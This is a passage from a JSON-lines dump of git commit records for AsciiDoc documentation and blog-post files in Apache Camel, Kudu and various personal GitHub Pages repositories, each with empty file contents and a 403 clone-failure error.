mel,pkletsko\/camel,drsquidop\/camel,RohanHart\/camel,pax95\/camel,pax95\/camel,curso007\/camel,w4tson\/camel,Fabryprog\/camel,onders86\/camel,akhettar\/camel,snurmine\/camel,cunningt\/camel,lburgazzoli\/apache-camel,neoramon\/camel,DariusX\/camel,cunningt\/camel,gilfernandes\/camel,anoordover\/camel,mgyongyosi\/camel,bhaveshdt\/camel,gnodet\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,apache\/camel,akhettar\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,jarst\/camel,ullgren\/camel,Fabryprog\/camel,lburgazzoli\/camel,Thopap\/camel,ssharma\/camel,apache\/camel,YoshikiHigo\/camel,ullgren\/camel,jlpedrosa\/camel,chirino\/camel,tdiesler\/camel,christophd\/camel,kevinearls\/camel,prashant2402\/camel,mgyongyosi\/camel,CodeSmell\/camel,anoordover\/camel,acartapanis\/camel,borcsokj\/camel,alvinkwekel\/camel,gnodet\/camel,gautric\/camel,christophd\/camel,curso007\/camel,scranton\/camel,sirlatrom\/camel,pmoerenhout\/camel,anton-k11\/camel,jonmcewen\/camel,onders86\/camel,neoramon\/camel,christophd\/camel,tdiesler\/camel,JYBESSON\/camel,gnodet\/camel,NickCis\/camel,pkletsko\/camel,jamesnetherton\/camel,ullgren\/camel,drsquidop\/camel,pmoerenhout\/camel,nikvaessen\/camel,veithen\/camel,jarst\/camel,adessaigne\/camel,scranton\/camel,nikvaessen\/camel,jonmcewen\/camel,acartapanis\/camel,rmarting\/camel,akhettar\/camel,jkorab\/camel,Fabryprog\/camel,scranton\/camel,drsquidop\/camel,objectiser\/camel,adessaigne\/camel,sabre1041\/camel,tdiesler\/camel,isavin\/camel,nboukhed\/camel,gnodet\/camel,tadayosi\/camel,sverkera\/camel,prashant2402\/camel,tadayosi\/camel,RohanHart\/camel,oalles\/camel,gilfernandes\/camel,jmandawg\/camel,jarst\/camel,anton-k11\/camel,pmoerenhout\/camel,davidkarlsen\/camel,jonmcewen\/camel,FingolfinTEK\/camel,jarst\/camel,allancth\/camel,veithen\/camel,neoramon\/camel,FingolfinTEK\/camel,lburgazzoli\/apache-camel,rmarting\/camel,snurmine\/camel,jmandawg\/camel,Thopap\/camel,bgaudaen\/camel,cunningt\/camel,FingolfinTEK\/camel,oalles\/camel,sverkera\/camel,objectiser\/camel,jkorab\/camel,isavin\/camel,ssharma\/camel,bgaudaen\/camel,mgyongyosi\/camel,acartapanis\/camel,zregvart\/camel,tdiesler\/camel,alvinkwekel\/camel,anton-k11\/camel,chirino\/camel,objectiser\/camel,pmoerenhout\/camel,w4tson\/camel,yuruki\/camel,nicolaferraro\/camel,tdiesler\/camel,anoordover\/camel,curso007\/camel,gautric\/camel,gilfernandes\/camel,pmoerenhout\/camel,adessaigne\/camel,sirlatrom\/camel,tlehoux\/camel,drsquidop\/camel,jmandawg\/camel,apache\/camel,jlpedrosa\/camel,prashant2402\/camel,RohanHart\/camel,gautric\/camel,christophd\/camel,sabre1041\/camel,RohanHart\/camel,neoramon\/camel,apache\/camel,oalles\/camel,drsquidop\/camel,gilfernandes\/camel,FingolfinTEK\/camel,anoordover\/camel,ssharma\/camel,prashant2402\/camel,jonmcewen\/camel,anton-k11\/camel,CodeSmell\/camel,dmvolod\/camel,sverkera\/camel,nikhilvibhav\/camel,gilfernandes\/camel,sabre1041\/camel,driseley\/camel,ssharma\/camel,yuruki\/camel,yuruki\/camel,tkopczynski\/camel,yuruki\/camel,lburgazzoli\/camel,acartapanis\/camel,tkopczynski\/camel,kevinearls\/camel,jamesnetherton\/camel,driseley\/camel,jamesnetherton\/camel,FingolfinTEK\/camel,snurmine\/camel,sirlatrom\/camel,tlehoux\/camel,w4tson\/camel,RohanHart\/camel,jlpedrosa\/camel,salikjan\/camel,anton-k11\/camel,apache\/camel,JYBESSON\/camel,bgaudaen\/camel,bhaveshdt\/camel,NickCis\/camel,tadayosi\/camel,kevinearls\/camel,pkletsko\/camel,chirino\/camel,snurmine\/camel,bgaudaen\/camel,jonmcewen\/camel,hqstevenson\/camel,gautric\/camel,rmarting\/camel,YoshikiHigo\/camel,allancth\/camel,kevinearls\/camel,nboukhed\/camel,snurmine\/camel,acartapanis\/camel,hqstevenson\/camel,NickCis\/camel,davidkarlsen\/camel,mgyongyosi\/camel,tdiesler\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,FingolfinTEK\/camel,w4tson\/camel,borcsokj\/camel,davidkarlsen\/camel,curso007\/camel,akhettar\/camel,jamesnetherton\/camel,jkorab\/camel,Thopap\/camel,davidkarlsen\/camel,Thopap\/camel,pkletsko\/camel,oalles\/camel,w4tson\/camel,pax95\/camel,gautric\/camel,hqstevenson\/camel,tlehoux\/camel,anoordover\/camel,driseley\/camel,mgyongyosi\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,adessaigne\/camel,YoshikiHigo\/camel,YoshikiHigo\/camel,tadayosi\/camel,sabre1041\/camel,ssharma\/camel,allancth\/camel,w4tson\/camel,alvinkwekel\/camel,veithen\/camel,onders86\/camel,cunningt\/camel,akhettar\/camel,pax95\/camel,Thopap\/camel,kevinearls\/camel,YoshikiHigo\/camel,sabre1041\/camel,JYBESSON\/camel,cunningt\/camel,christophd\/camel,JYBESSON\/camel,tkopczynski\/camel,jlpedrosa\/camel,apache\/camel,dmvolod\/camel,RohanHart\/camel,pax95\/camel,dmvolod\/camel,CodeSmell\/camel,tlehoux\/camel,scranton\/camel,bgaudaen\/camel,jmandawg\/camel,allancth\/camel,veithen\/camel,curso007\/camel,anoordover\/camel,punkhorn\/camel-upstream,allancth\/camel,neoramon\/camel,nboukhed\/camel,lburgazzoli\/camel,mgyongyosi\/camel,yuruki\/camel,gnodet\/camel,nboukhed\/camel,mcollovati\/camel,nikvaessen\/camel,jonmcewen\/camel,NickCis\/camel,lburgazzoli\/camel,adessaigne\/camel,JYBESSON\/camel,zregvart\/camel,nicolaferraro\/camel,lburgazzoli\/camel,ullgren\/camel,christophd\/camel,onders86\/camel,jkorab\/camel,jarst\/camel,jkorab\/camel,snurmine\/camel,JYBESSON\/camel,sirlatrom\/camel,jmandawg\/camel,cunningt\/camel,dmvolod\/camel,salikjan\/camel,akhettar\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,jlpedrosa\/camel,jlpedrosa\/camel,nikvaessen\/camel,pax95\/camel,isavin\/camel,jkorab\/camel,borcsokj\/camel,pkletsko\/camel,nboukhed\/camel,bgaudaen\/camel,jarst\/camel,veithen\/camel,scranton\/camel,sverkera\/camel,punkhorn\/camel-upstream,rmarting\/camel,bhaveshdt\/camel,curso007\/camel,anton-k11\/camel,lburgazzoli\/camel,nikhilvibhav\/camel,nikvaessen\/camel,DariusX\/camel,DariusX\/camel,Thopap\/camel,bhaveshdt\/camel,allancth\/camel,neoramon\/camel,prashant2402\/camel,jmandawg\/camel,dmvolod\/camel,veithen\/camel,tlehoux\/camel,oalles\/camel,prashant2402\/camel,rmarting\/camel,dmvolod\/camel,objectiser\/camel,sverkera\/camel,zregvart\/camel,oalles\/camel,borcsokj\/camel,mcollovati\/camel,NickCis\/camel","old_file":"components\/camel-zipfile\/src\/main\/docs\/zipfile.adoc","new_file":"components\/camel-zipfile\/src\/main\/docs\/zipfile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"796f6369127b732bf27883972533d2f038df9e97","subject":"y2b create post Infamous 2 Hero Edition Unboxing (HD)","message":"y2b create post Infamous 2 Hero Edition Unboxing (HD)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-09-Infamous-2-Hero-Edition-Unboxing-HD.adoc","new_file":"_posts\/2011-06-09-Infamous-2-Hero-Edition-Unboxing-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31fd1c666e63e6b85bcf7b94487655479ae1bdb4","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb1cd99eb5841a9da8ce0ccb530acdcacf2c0167","subject":"Update 2016-11-15-Hacking-daily-nius-151116.adoc","message":"Update 2016-11-15-Hacking-daily-nius-151116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-15-Hacking-daily-nius-151116.adoc","new_file":"_posts\/2016-11-15-Hacking-daily-nius-151116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfb9a77c5220a5060c96637e32691d88f3dd36ca","subject":"Update 2017-08-10-tear-down-is-the-only-way.adoc","message":"Update 2017-08-10-tear-down-is-the-only-way.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-08-10-tear-down-is-the-only-way.adoc","new_file":"_posts\/2017-08-10-tear-down-is-the-only-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a76495d3c58d36cf9c20bb9b46cf36f7d9005d8","subject":"MiQ sprint demos.","message":"MiQ sprint demos.\n","repos":"jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/04\/08\/hawkular-manage-iq-sprint-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/04\/08\/hawkular-manage-iq-sprint-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a37e0b9fae09042f08720c518eced9f68444a13","subject":"Added some documentation about Smarti Components","message":"Added some documentation about Smarti Components\n","repos":"redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti","old_file":"docs\/components.adoc","new_file":"docs\/components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redlink-gmbh\/smarti.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad2995714bafd4fba07d42aca99092bb12b9cf22","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e188ccc32c98e79e4e490dd60ab4b51b104ea8c2","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01f88e44bb078db3ee20572fc4481f5a49328b8c","subject":"Proper Array and Object Access Patterns","message":"Proper Array and Object Access Patterns\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-xx-proper-array-and-object-access-patterns.adoc","new_file":"content\/news\/2017-07-xx-proper-array-and-object-access-patterns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"667ed2e28f2bbfc7680a774232811e1d210dd4cc","subject":"y2b create post Nintendo 3DS Special Zelda Edition Unboxing","message":"y2b create post Nintendo 3DS Special Zelda Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-25-Nintendo-3DS-Special-Zelda-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-25-Nintendo-3DS-Special-Zelda-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e2552c59409e5ed78377e9406e7b3cdb40fe7c7","subject":"y2b create post This Cup Is Unspillable - What Magic Is This?","message":"y2b create post This Cup Is Unspillable - What Magic Is This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-03-This-Cup-Is-Unspillable--What-Magic-Is-This.adoc","new_file":"_posts\/2016-07-03-This-Cup-Is-Unspillable--What-Magic-Is-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32af142a9f721c5a98a0589564af9fc5d8d8bee4","subject":"Added Camel 2.18.3 release notes to docs","message":"Added Camel 2.18.3 release notes to docs\n","repos":"ullgren\/camel,adessaigne\/camel,pmoerenhout\/camel,jamesnetherton\/camel,Fabryprog\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,DariusX\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,christophd\/camel,nicolaferraro\/camel,sverkera\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,tdiesler\/camel,apache\/camel,adessaigne\/camel,objectiser\/camel,jamesnetherton\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,kevinearls\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,sverkera\/camel,gnodet\/camel,nicolaferraro\/camel,gnodet\/camel,punkhorn\/camel-upstream,DariusX\/camel,christophd\/camel,anoordover\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,ullgren\/camel,sverkera\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,zregvart\/camel,kevinearls\/camel,kevinearls\/camel,onders86\/camel,jamesnetherton\/camel,gnodet\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,davidkarlsen\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,sverkera\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,apache\/camel,anoordover\/camel,sverkera\/camel,onders86\/camel,tdiesler\/camel,cunningt\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,tadayosi\/camel,mcollovati\/camel,christophd\/camel,zregvart\/camel,tdiesler\/camel,pax95\/camel,CodeSmell\/camel,christophd\/camel,objectiser\/camel,CodeSmell\/camel,anoordover\/camel,tdiesler\/camel,objectiser\/camel,ullgren\/camel,tadayosi\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,DariusX\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,pmoerenhout\/camel,CodeSmell\/camel,Fabryprog\/camel,DariusX\/camel,onders86\/camel,alvinkwekel\/camel,onders86\/camel,onders86\/camel,davidkarlsen\/camel,alvinkwekel\/camel,alvinkwekel\/camel,anoordover\/camel,sverkera\/camel,adessaigne\/camel,Fabryprog\/camel,tdiesler\/camel,anoordover\/camel,objectiser\/camel,zregvart\/camel,christophd\/camel,cunningt\/camel,mcollovati\/camel,kevinearls\/camel,anoordover\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,zregvart\/camel,nicolaferraro\/camel,ullgren\/camel,Fabryprog\/camel,pax95\/camel,jamesnetherton\/camel,kevinearls\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2183-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2183-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bb93e3c6634cd1ac1f795e3f4cfbea66932d546","subject":"Update 2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","message":"Update 2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","new_file":"_posts\/2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eff5257d7f7b0137d3f2d1115770233b0ff72310","subject":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","message":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34b6526f3808fcf1adbeb43d9325400d40ed51f3","subject":"Update 2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","message":"Update 2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","new_file":"_posts\/2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"573b86c23a7aa18a3a97b5ba8ec280abc98fff1a","subject":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","message":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b19f591bf5168ffa31f6642eca7bad049efcf32","subject":"add extension post","message":"add extension post\n","repos":"antoinesd\/antoinesd.github.io,antoinesd\/antoinesd.github.io","old_file":"2017-01-27-nobody-expects-the-cdi-portable-extensions.adoc","new_file":"2017-01-27-nobody-expects-the-cdi-portable-extensions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/antoinesd\/antoinesd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108080714e7ff105e2d94c4eb6c48f1468f6d32d","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ca3df3346ef9507db6085550556ef5f5d69ea2","subject":"Update 2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","message":"Update 2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","new_file":"_posts\/2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8de8f29a365ce18808d63ba4df1ad751bb8f0a6","subject":"Update 2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","message":"Update 2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","new_file":"_posts\/2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a707994290e5d601985bf2f2ea6c822b6c0c330","subject":"Improvements and corrections to Impala CREATE TABLE examples","message":"Improvements and corrections to Impala CREATE TABLE examples\n\nChange-Id: I093972a7b806787a8c72634851796eebb5e1ae4c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3376\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"887ef9cc7fe31ea7ac0ad553124397957136a6b8","subject":"Update 2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","message":"Update 2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","new_file":"_posts\/2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c4b995860a26889f55cd9f46acdf874dc95233","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e68fa7f56c581287341ed9b6d2d7ede680b677aa","subject":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","message":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e647a49151afd9bb140494afd65f6f0d82991da","subject":"Update 2015-09-16-When-Epiales-Calls.adoc","message":"Update 2015-09-16-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-16-When-Epiales-Calls.adoc","new_file":"_posts\/2015-09-16-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf05a1b4403da3e9582e0f03b0288a6d9949d693","subject":"Update 2017-02-04-Dies-ist-der-Titel.adoc","message":"Update 2017-02-04-Dies-ist-der-Titel.adoc","repos":"DaOesten\/hubpress.io,DaOesten\/hubpress.io,DaOesten\/hubpress.io,DaOesten\/hubpress.io","old_file":"_posts\/2017-02-04-Dies-ist-der-Titel.adoc","new_file":"_posts\/2017-02-04-Dies-ist-der-Titel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DaOesten\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"545c473bfff44fc7695d86b6c14fdc67082e8d95","subject":"create post The Invisible iPhone Button...","message":"create post The Invisible iPhone 